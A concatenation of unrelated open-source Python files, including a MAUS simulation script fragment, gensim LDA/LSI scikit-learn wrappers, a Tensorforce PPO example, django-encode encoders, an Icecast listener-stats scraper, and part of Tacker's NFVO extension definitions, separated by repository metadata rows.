# KL
my_map.append(MAUS.MapCppKLMCDigitizer()) # KL MC Digitizer
my_map.append(MAUS.MapCppKLCellHits()) # KL CellHit Reco
# SciFi
my_map.append(MAUS.MapCppTrackerMCDigitization()) # SciFi electronics model
my_map.append(MAUS.MapCppTrackerClusterRecon()) # SciFi channel clustering
my_map.append(MAUS.MapCppTrackerSpacePointRecon()) # SciFi spacepoint recon
my_map.append(MAUS.MapCppTrackerPatternRecognition()) # SciFi track finding
my_map.append(MAUS.MapCppTrackerPRSeed()) # Set the Seed from PR
# my_map.append(MAUS.MapCppTrackerPRFullSeed()) # Set the Seed from PR
my_map.append(MAUS.MapCppTrackerTrackFit()) # SciFi track fit
# EMR
my_map.append(MAUS.MapCppEMRMCDigitization()) # EMR MC Digitizer
my_map.append(MAUS.MapCppEMRSpacePoints()) # EMR Space Points
my_map.append(MAUS.MapCppEMRRecon()) # EMR Recon
# Ckov
my_map.append(MAUS.MapCppCkovMCDigitizer())
# Global Digits - post detector digitisation
# Then construct a MAUS output component - filename comes from datacards
my_output = MAUS.OutputCppRoot()
# can specify datacards here or by using appropriate command line calls
datacards = io.StringIO(u"")
# The Go() drives all the components you pass in, then check the file
# (default simulation.out) for output
MAUS.Go(my_input, my_map, MAUS.ReducePyDoNothing(), my_output, datacards)
if __name__ == '__main__':
run()
| gpl-3.0 | 6,921,036,674,128,893,000 | 33.794521 | 80 | 0.709843 | false | 3.190955 | false | false | false |
StevenReitsma/gensim-sklearn-wrapper | gensim_wrapper.py | 1 | 3933 | import numpy as np
from gensim import corpora, models, matutils
from sklearn.base import BaseEstimator
class LdaTransformer(BaseEstimator):
"""
See http://radimrehurek.com/gensim/models/ldamodel.html for parameter usage.
X should be a list of tokens for each document, e.g. [['This', 'is', 'document', '1'], ['Second', 'document']]
"""
def __init__(self, n_latent_topics = 100, use_tfidf = False, distributed = False, chunksize = 2000, passes = 1, update_every = 1, alpha = 'symmetric', eta = None, decay = 0.5, eval_every = 10, iterations = 50, gamma_threshold = 0.001):
self.n_latent_topics = n_latent_topics
self.distributed = distributed
self.chunksize = chunksize
self.passes = passes
self.update_every = update_every
self.alpha = alpha
self.eta = eta
self.decay = decay
self.eval_every = eval_every
self.iterations = iterations
self.gamma_threshold = gamma_threshold
self.use_tfidf = use_tfidf
def transform(self, X):
corpus = [self.dictionary.doc2bow(text) for text in X]
if self.use_tfidf:
corpus = self.tfidf[corpus]
corpus_lda = self.model[corpus]
corpus_lda_dense = matutils.corpus2dense(corpus_lda, self.n_latent_topics).T
return corpus_lda_dense
def fit(self, X, y=None):
self.dictionary = corpora.Dictionary(X)
corpus = [self.dictionary.doc2bow(text) for text in X]
if self.use_tfidf:
self.tfidf = models.TfidfModel(corpus)
corpus = self.tfidf[corpus]
self.model = models.LdaModel(corpus, id2word = self.dictionary, num_topics = self.n_latent_topics, distributed = self.distributed, chunksize = self.chunksize, passes = self.passes, update_every = self.update_every, alpha = self.alpha, eta = self.eta, decay = self.decay, eval_every = self.eval_every, iterations = self.iterations, gamma_threshold = self.gamma_threshold)
return self
def get_params(self, deep = False):
		return {'n_latent_topics': self.n_latent_topics, 'use_tfidf': self.use_tfidf, 'distributed': self.distributed, 'chunksize': self.chunksize, 'passes': self.passes, 'update_every': self.update_every, 'alpha': self.alpha, 'eta': self.eta, 'decay': self.decay, 'eval_every': self.eval_every, 'iterations': self.iterations, 'gamma_threshold': self.gamma_threshold}
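	# Illustrative usage sketch (toy corpus assumed, not part of the original
	# file):
	#   docs = [['human', 'machine', 'interface'], ['graph', 'trees', 'minors']]
	#   lda = LdaTransformer(n_latent_topics=2, passes=5)
	#   topic_vectors = lda.fit(docs).transform(docs)  # (n_docs, n_topics) array
	# Because the class follows the scikit-learn estimator API, it can also be
	# placed inside a sklearn Pipeline or GridSearchCV.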
class LsiTransformer(BaseEstimator):
"""
See http://radimrehurek.com/gensim/models/lsimodel.html for parameter usage.
X should be a list of tokens for each document, e.g. [['This', 'is', 'document', '1'], ['Second', 'document']]
"""
def __init__(self, n_latent_topics = 100, use_tfidf = True, chunksize = 20000, decay = 1.0, distributed = False, onepass = True, power_iters = 2, extra_samples = 100):
self.n_latent_topics = n_latent_topics
self.use_tfidf = use_tfidf
self.chunksize = chunksize
self.decay = decay
self.distributed = distributed
self.onepass = onepass
self.power_iters = power_iters
self.extra_samples = extra_samples
def transform(self, X):
corpus = [self.dictionary.doc2bow(text) for text in X]
if self.use_tfidf:
corpus = self.tfidf[corpus]
corpus_lsi = self.model[corpus]
corpus_lsi_dense = matutils.corpus2dense(corpus_lsi, self.n_latent_topics).T
return corpus_lsi_dense
def fit(self, X, y=None):
self.dictionary = corpora.Dictionary(X)
corpus = [self.dictionary.doc2bow(text) for text in X]
if self.use_tfidf:
self.tfidf = models.TfidfModel(corpus)
corpus = self.tfidf[corpus]
self.model = models.LsiModel(corpus, id2word = self.dictionary, num_topics = self.n_latent_topics, chunksize = self.chunksize, decay = self.decay, distributed = self.distributed, onepass = self.onepass, power_iters = self.power_iters, extra_samples = self.extra_samples)
return self
def get_params(self, deep = False):
return {'n_latent_topics': self.n_latent_topics, 'use_tfidf': self.use_tfidf, 'chunksize': self.chunksize, 'decay': self.decay, 'distributed': self.distributed, 'onepass': self.onepass, 'power_iters': self.power_iters, 'extra_samples': self.extra_samples} | mit | -8,260,677,746,161,423,000 | 42.230769 | 372 | 0.715993 | false | 3.044118 | false | false | false |
reinforceio/tensorforce | examples/act_experience_update_interface.py | 1 | 2827 | # Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from tensorforce import Agent, Environment
def main():
environment = Environment.create(environment='benchmarks/configs/cartpole.json')
agent = Agent.create(agent='benchmarks/configs/ppo.json', environment=environment)
# Train for 100 episodes
for episode in range(100):
# Record episode experience
episode_states = list()
episode_internals = list()
episode_actions = list()
episode_terminal = list()
episode_reward = list()
        # Episode using independent-act and agent.initial_internals()
states = environment.reset()
internals = agent.initial_internals()
terminal = False
sum_rewards = 0.0
while not terminal:
episode_states.append(states)
episode_internals.append(internals)
actions, internals = agent.act(states=states, internals=internals, independent=True)
episode_actions.append(actions)
states, terminal, reward = environment.execute(actions=actions)
episode_terminal.append(terminal)
episode_reward.append(reward)
sum_rewards += reward
print('Episode {}: {}'.format(episode, sum_rewards))
# Feed recorded experience to agent
agent.experience(
states=episode_states, internals=episode_internals, actions=episode_actions,
terminal=episode_terminal, reward=episode_reward
)
# Perform update
agent.update()
# Evaluate for 100 episodes
sum_rewards = 0.0
for _ in range(100):
states = environment.reset()
internals = agent.initial_internals()
terminal = False
while not terminal:
actions, internals = agent.act(
states=states, internals=internals, independent=True, deterministic=True
)
states, terminal, reward = environment.execute(actions=actions)
sum_rewards += reward
print('Mean evaluation return:', sum_rewards / 100.0)
# Close agent and environment
agent.close()
environment.close()
if __name__ == '__main__':
main()
| apache-2.0 | -2,013,646,596,207,297,800 | 35.24359 | 96 | 0.638132 | false | 4.530449 | false | false | false |
collab-project/django-encode | encode/encoders.py | 1 | 4284 | # Copyright Collab 2013-2016
# See LICENSE for details.
"""
Encoders.
"""
from __future__ import unicode_literals
import os
import shlex
import logging
import subprocess
try:
from django.utils.module_loading import import_string
except ImportError:
from django.utils.module_loading import import_by_path as import_string
from converter.ffmpeg import FFMpeg, FFMpegError, FFMpegConvertError
from encode import EncodeError
from encode.conf import settings
logger = logging.getLogger(__name__)
def get_encoder_class(import_path=None):
"""
Get the encoder class by supplying a fully qualified path to
``import_path``.
If ``import_path`` is ``None`` the default encoder class specified in the
    :py:data:`~encode.conf.ENCODE_DEFAULT_ENCODER_CLASS` setting is returned.
:param import_path: Fully qualified path of the encoder class, for example:
``encode.encoders.BasicEncoder``.
:type import_path: str
:returns: The encoder class.
:rtype: class
"""
return import_string(import_path or settings.ENCODE_DEFAULT_ENCODER_CLASS)
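# Illustrative usage (the dotted path and file names below are example values;
# `profile` is assumed to be an EncodingProfile instance):
#   encoder_cls = get_encoder_class('encode.encoders.FFMpegEncoder')
#   encoder = encoder_cls(profile, input_path='/tmp/in.webm',
#                         output_path='/tmp/out.mp4')
#   encoder.start()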
class BaseEncoder(object):
"""
The base encoder.
:param profile: The encoding profile that configures this encoder.
:type profile: :py:class:`~encode.models.EncodingProfile`
    :param input_path: Path of the source file to encode.
    :type input_path: str
    :param output_path: Path where the encoded output file is written.
    :type output_path: str
"""
def __init__(self, profile, input_path=None, output_path=None):
self.profile = profile
self.input_path = input_path
self.output_path = output_path
def _build_exception(self, error, command):
"""
Build an :py:class:`~encode.EncodeError` and return it.
:param error: The description of the error.
:type error: str
:param command: The command used to produce the error.
:type command: str
:rtype: :py:class:`~encode.EncodeError`
"""
output = getattr(error, 'output', None)
exc = EncodeError(error)
exc.output = output
exc.command = command
logger.error('Command output: {}'.format(output))
return exc
@property
def command(self):
"""
The command for the encoder with the vars injected, eg.
``convert "/path/to/input.gif" "/path/to/output.png"``.
:rtype: str
:returns: The command.
"""
args = {
"input": self.input_path,
"output": self.output_path
}
return str(self.profile.encode_cmd.format(**args))
class BasicEncoder(BaseEncoder):
"""
Encoder that uses the :py:mod:`subprocess` module.
"""
def start(self):
"""
Start encoding.
:raises: :py:exc:`~encode.EncodeError` if something goes wrong
during encoding.
"""
command = shlex.split(self.command)
try:
subprocess.check_output(command, stderr=subprocess.STDOUT)
except OSError as error:
if error.errno == os.errno.ENOENT:
# program not found
exc = self._build_exception("{}: {}".format(
command[0], str(error)), self.command)
else:
exc = self._build_exception(str(error), self.command)
raise exc
except subprocess.CalledProcessError as error:
exc = self._build_exception(error, self.command)
raise exc
class FFMpegEncoder(BaseEncoder):
"""
Encoder that uses the `FFMpeg <https://ffmpeg.org>`_ tool.
"""
def start(self):
"""
Start encoding.
:raises: :py:exc:`~encode.EncodeError` if something goes wrong
during encoding.
"""
command = shlex.split(self.profile.command)
try:
ffmpeg = FFMpeg(self.profile.encoder.path)
job = ffmpeg.convert(self.input_path, self.output_path, command)
for timecode in job:
logger.debug("Encoding (time: %f)...\r" % timecode)
except FFMpegError as error:
exc = self._build_exception(error, self.profile.command)
raise exc
except FFMpegConvertError as error:
exc = self._build_exception(error.details, self.profile.command)
raise exc
| mit | -5,457,834,688,075,999,000 | 26.63871 | 79 | 0.611578 | false | 4.111324 | false | false | false |
Xicnet/radioflow-scheduler | project/icecast_stats/realtime_stats.py | 1 | 5653 | __version__ = "0.1"
__author__ = "radiocicletta <[email protected]>"
# borrowed from: https://github.com/radiocicletta/morganfreeman
import threading
from SocketServer import ThreadingTCPServer
import logging
import urllib2
from urllib import unquote
import re
import mimetypes
import os
import sys
import json
from StringIO import StringIO
from geo import GeoIP
logger = logging.getLogger('icecast.daemon')
ICECAST_V_2_3 = '2.3.'
ICECAST_V_2_4 = '2.4.'
ICECAST_V_KH = '-kh'
class StatsCollector():
def __init__(self, host, user, pw, realm, mount):
self.host = host
self.user = user
self.pw = pw
self.realm = realm
self.mount = mount
self.geo = GeoIP()
def run(self):
logger.debug("launched StatsCollector Instance")
try:
result = urllib2.urlopen(self.host + "/server_version.xsl")
except Exception as e:
print e
logger.error("Failed update: %s", e)
            return None
resultstr = result.read()
server_info = dict(
re.findall(
'<tr[^>]*>[\r\s]*<td[^>]*>([^\r<>]*?)</td>[\s\r]*'
'<td[^>]*>([^\r<>]*?)</td>',
resultstr)
)
self.server_version = re.match("Icecast (.*)", server_info['Version']).groups()[0]
if True:
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(
realm=self.realm,
uri=self.host + "/admin/",
user=self.user,
passwd=self.pw)
auth_handler_mounts = urllib2.HTTPBasicAuthHandler()
auth_handler_mounts.add_password(
realm=self.realm,
uri=self.host + "/admin/listmounts.xsl",
user=self.user,
passwd=self.pw)
opener_mounts = urllib2.build_opener(auth_handler_mounts)
urllib2.install_opener(opener_mounts)
# 1. retrieve all the current mount points
# 2. for each mount point
# gather information about listeners
# store in database
try:
result = urllib2.urlopen(self.host + "/admin/listmounts.xsl")
except Exception as e:
logger.error("Failed update: %s", e)
result = None
if not result:
return
mountpoints = re.findall(
"listclients\.xsl\?mount=/([^\"]*)", result.read())
#for mount in mountpoints:
if self.mount in mountpoints:
h_m = urllib2.HTTPBasicAuthHandler()
h_m.add_password(
realm=self.realm,
uri=self.host + "/admin/listclients.xsl?mount=/" + self.mount,
user=self.user,
passwd=self.pw)
o_m = urllib2.build_opener(h_m)
urllib2.install_opener(o_m)
try:
result = urllib2.urlopen(
self.host + "/admin/listclients.xsl?mount=/" + self.mount)
except:
logger.error("skipping %s", self.mount)
                return None
resultstr = result.read()
try:
# the latest (fourth in vanilla, third in -kh) table
# on listclients.xls is the relevant one
table = re.findall(
"<table[^>]*>([^\r]*?)</table>", resultstr)[-1]
except:
# 2.4.0
_table = re.findall(
'<table[^>]*class="colortable"[^>]*>([^\r]*?)</table>', resultstr)
if not _table:
                    return None
table = _table[0]
listeners = re.findall("<tr[^>]*>([^\r]*?)</tr>", table)
if ICECAST_V_KH in self.server_version:
rowskip = 0
else:
rowskip = 1
# in icecast vanilla, first row is the
# table header. in -kh, the header is enclosed in <thead>
# without use of <tr>
logger.debug("registering %d entries", len(listeners) - rowskip)
listener_details = []
for listener in listeners[rowskip:]:
fields = re.findall("<td[^>]*>([^\r]*?)</td>", listener)
if not ICECAST_V_KH in self.server_version: # vanilla
# fields[0]: IP
# fields[1]: Seconds since connection
# fields[2]: user-agent
# fields[3]: action
#print self.mount, fields[0], int(fields[1]), fields[2], self.geo.geoip(fields[0])
listener_details.append({'mount': self.mount, 'ip': fields[0], 'duration': int(fields[1]), 'user_agent': fields[2], 'country': self.geo.geoip(fields[0])})
else:
# fields[0]: IP
# fields[1]: Seconds since connection
# fields[2]: lag
# fields[3]: user-agent
# fields[4]: action
#print self.mount, fields[0], int(fields[1]), fields[3], self.geo.geoip(fields[0])
listener_details.append({'mount': self.mount, 'ip': fields[0], 'duration': int(fields[1]), 'user_agent': fields[3], 'country': self.geo.geoip(fields[0])})
return listener_details
| agpl-3.0 | 3,395,360,613,107,391,000 | 38.809859 | 178 | 0.482576 | false | 4.266415 | false | false | false |
stackforge/tacker | tacker/extensions/nfvo.py | 2 | 26383 | # Copyright 2016 Brocade Communications Systems Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from tacker._i18n import _
from tacker.api import extensions
from tacker.api.v1 import attributes as attr
from tacker.api.v1 import resource_helper
from tacker.common import exceptions
from tacker.plugins.common import constants
from tacker.services import service_base
class VimUnauthorizedException(exceptions.TackerException):
message = _("%(message)s")
class VimConnectionException(exceptions.TackerException):
message = _("%(message)s")
class VimInUseException(exceptions.TackerException):
message = _("VIM %(vim_id)s is still in use by VNF")
class VimDefaultNotDefined(exceptions.TackerException):
message = _("Default VIM is not defined.")
class VimDefaultDuplicateException(exceptions.TackerException):
message = _("Default VIM already exists %(vim_id)s.")
class VimNotFoundException(exceptions.TackerException):
message = _("Specified VIM id %(vim_id)s is invalid. Please verify and "
"pass a valid VIM id")
class VimRegionNotFoundException(exceptions.TackerException):
message = _("Unknown VIM region name %(region_name)s")
class VimKeyNotFoundException(exceptions.TackerException):
message = _("Unable to find key file for VIM %(vim_id)s")
class VimEncryptKeyError(exceptions.TackerException):
message = _("Barbican must be enabled for VIM %(vim_id)s")
class VimUnsupportedResourceTypeException(exceptions.TackerException):
message = _("Resource type %(type)s is unsupported by VIM")
class VimGetResourceException(exceptions.TackerException):
message = _("Error while trying to issue %(cmd)s to find resource type "
"%(type)s by resource name %(name)s")
class VimGetResourceNameNotUnique(exceptions.TackerException):
message = _("Getting resource id from VIM with resource name %(name)s "
"by %(cmd)s returns more than one")
class VimGetResourceNotFoundException(exceptions.TackerException):
message = _("Getting resource id from VIM with resource name %(name)s "
"by %(cmd)s returns nothing")
class VimFromVnfNotFoundException(exceptions.NotFound):
message = _('VIM from VNF %(vnf_id)s could not be found')
class ToscaParserFailed(exceptions.InvalidInput):
message = _("tosca-parser failed: - %(error_msg_details)s")
class VnffgdInvalidTemplate(exceptions.InvalidInput):
message = _("Invalid VNFFG template input: %(template)s")
class VnffgdDuplicateForwarderException(exceptions.InvalidInput):
message = _("Invalid Forwarding Path contains duplicate forwarder not in "
"order: %(forwarder)s")
class VnffgdDuplicateCPException(exceptions.InvalidInput):
message = _("Invalid Forwarding Path contains duplicate connection point "
": %(cp)s")
class VnffgdVnfdNotFoundException(exceptions.NotFound):
message = _("Specified VNFD %(vnfd_name)s in VNFFGD does not exist. "
"Please create VNFDs before creating VNFFG")
class VnffgdCpNotFoundException(exceptions.NotFound):
message = _("Specified CP %(cp_id)s could not be found in VNFD "
"%(vnfd_name)s. Please check VNFD for correct Connection "
"Point.")
class VnffgdCpNoForwardingException(exceptions.TackerException):
message = _("Specified CP %(cp_id)s in VNFD %(vnfd_name)s "
"does not have forwarding capability, which is required to be "
"included in forwarding path")
class VnffgdWrongEndpointNumber(exceptions.TackerException):
message = _("Specified number_of_endpoints %(number)s is not equal to "
"the number of connection_point %(cps)s")
class VnffgdInUse(exceptions.InUse):
message = _('VNFFGD %(vnffgd_id)s is still in use')
class VnffgdNotFoundException(exceptions.NotFound):
message = _('VNFFG Template %(vnffgd_id)s could not be found')
class VnffgCreateFailed(exceptions.TackerException):
message = _('Creating VNFFG based on %(vnffgd_id)s failed')
class VnffgInvalidMappingException(exceptions.TackerException):
message = _("Matching VNF Instance for VNFD %(vnfd_name)s could not be "
"found. Please create an instance of this VNFD before "
"creating/updating VNFFG.")
class VnffgParamValueFormatError(exceptions.TackerException):
message = _("Param values %(param_value)s is not in dict format.")
class VnffgTemplateParamParsingException(exceptions.TackerException):
message = _("Failed to parse VNFFG Template due to "
"missing input param %(get_input)s.")
class VnffgPropertyNotFoundException(exceptions.NotFound):
message = _('VNFFG Property %(vnffg_property)s could not be found')
class VnffgCpNotFoundException(exceptions.NotFound):
message = _("Specified CP %(cp_id)s could not be found in VNF "
"%(vnf_id)s.")
class VnffgNotFoundException(exceptions.NotFound):
message = _('VNFFG %(vnffg_id)s could not be found')
class VnffgInUse(exceptions.InUse):
message = _('VNFFG %(vnffg_id)s is still in use')
class VnffgVnfNotFoundException(exceptions.NotFound):
message = _("Specified VNF instance %(vnf_name)s in VNF Mapping could not "
"be found")
class VnffgDeleteFailed(exceptions.TackerException):
message = _('Deleting VNFFG %(vnffg_id)s failed')
class VnffgInUseNS(exceptions.TackerException):
message = _('VNFFG %(vnffg_id)s belongs to active network service '
'%(ns_id)s')
class NfpAttributeNotFoundException(exceptions.NotFound):
message = _('NFP attribute %(attribute)s could not be found')
class NfpNotFoundException(exceptions.NotFound):
message = _('NFP %(nfp_id)s could not be found')
class NfpInUse(exceptions.InUse):
message = _('NFP %(nfp_id)s is still in use')
class NfpPolicyCriteriaError(exceptions.PolicyCheckError):
message = _('%(error)s in policy')
class NfpPolicyCriteriaIndexError(exceptions.TackerException):
message = _('Criteria list can not be empty')
class NfpDuplicatePolicyCriteria(exceptions.TackerException):
message = _('The %(first_dict)s and %(sec_dict)s are overlapped')
class NfpDuplicatePathID(exceptions.TackerException):
message = _('The path_id %(path_id)s is overlapped with '
'NFP %(nfp_name)s in %(vnffg_name)s')
class NfpPolicyTypeError(exceptions.PolicyCheckError):
message = _('Unsupported Policy Type: %(type)s')
class NfpForwarderNotFoundException(exceptions.NotFound):
message = _('VNFD Forwarder %(vnfd)s not found in VNF Mapping %(mapping)s')
class NfpRequirementsException(exceptions.TackerException):
message = _('VNFD Forwarder %(vnfd)s specified more than twice in '
'requirements path')
class SfcInUse(exceptions.InUse):
message = _('SFC %(sfc_id)s is still in use')
class SfcNotFoundException(exceptions.NotFound):
message = _('Service Function Chain %(sfc_id)s could not be found')
class ClassifierInUse(exceptions.InUse):
message = _('Classifier %(classifier_id)s is still in use')
class ClassifierNotFoundException(exceptions.NotFound):
message = _('Classifier %(classifier_id)s could not be found')
class VnfMappingNotFoundException(exceptions.NotFound):
message = _('VNF mapping not found/defined')
class VnfMappingNotValidException(exceptions.TackerException):
message = _('The %(vnfd)s is not found in constituent VNFDs')
class NSDInUse(exceptions.InUse):
message = _('NSD %(nsd_id)s is still in use')
class NSInUse(exceptions.InUse):
message = _('NS %(ns_id)s is still in use')
class NoTasksException(exceptions.TackerException):
message = _('No tasks to run for %(action)s on %(resource)s')
class UpdateChainException(exceptions.TackerException):
message = _("%(message)s")
class CreateChainException(exceptions.TackerException):
message = _("%(message)s")
class UpdateClassifierException(exceptions.TackerException):
message = _("%(message)s")
class UpdateVnffgException(exceptions.TackerException):
message = _("%(message)s")
class FlowClassiferCreationFailed(exceptions.TackerException):
message = _("%(message)s")
NAME_MAX_LEN = 255
RESOURCE_ATTRIBUTE_MAP = {
'vims': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True,
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True
},
'type': {
'allow_post': True,
'allow_put': False,
'validate': {'type:not_empty_string': None},
'is_visible': True
},
'auth_url': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True
},
'auth_cred': {
'allow_post': True,
'allow_put': True,
'validate': {'type:dict_not_empty': None},
'is_visible': True,
},
'vim_project': {
'allow_post': True,
'allow_put': True,
'validate': {'type:dict_not_empty': None},
'is_visible': True,
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'status': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
},
'placement_attr': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
'default': None,
},
'shared': {
'allow_post': False,
'allow_put': False,
'is_visible': False,
'convert_to': attr.convert_to_boolean,
'required_by_policy': True
},
'is_default': {
'allow_post': True,
'allow_put': True,
'is_visible': True,
'validate': {'type:boolean': None},
'default': False
},
'created_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'updated_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
},
'vnffgds': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True,
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True,
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'template': {
'allow_post': True,
'allow_put': False,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'template_source': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
'default': 'onboarded'
}
},
'vnffgs': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True
},
'vnffgd_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'default': None
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'vnf_mapping': {
'allow_post': True,
'allow_put': True,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'attributes': {
'allow_post': True,
'allow_put': True,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'symmetrical': {
'allow_post': True,
'allow_put': True,
'is_visible': True,
'validate': {'type:boolean': None},
'default': False,
},
'forwarding_paths': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'status': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'vnffgd_template': {
'allow_post': True,
'allow_put': True,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'ns_id': {
'allow_post': True,
'allow_put': False,
'is_visible': True,
'default': None,
},
},
'nfps': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True
},
'vnffg_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'name': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
},
'classifier_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'chain_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'path_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
},
'symmetrical': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
'validate': {'type:boolean': None},
'default': False,
},
'status': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
},
'sfcs': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True
},
'nfp_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'instance_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'chain': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'path_id': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'symmetrical': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
'validate': {'type:boolean': None},
'default': False,
},
'status': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
},
'classifiers': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True
},
'nfp_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'instance_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'match': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'chain_id': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'status': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
},
'nsds': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True,
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True,
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'created_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'updated_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'attributes': {
'allow_post': True,
'allow_put': False,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'template_source': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
'default': 'onboarded'
},
},
'nss': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True,
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True,
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
'default': '',
},
'created_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'updated_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'vnf_ids': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'vnffg_ids': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'nsd_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'default': None,
},
'placement_attr': {
'allow_post': True,
'allow_put': False,
'validate': {'type:dict_or_none': None},
'is_visible': True,
'default': {},
},
'vim_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'status': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'error_reason': {
'allow_post': False,
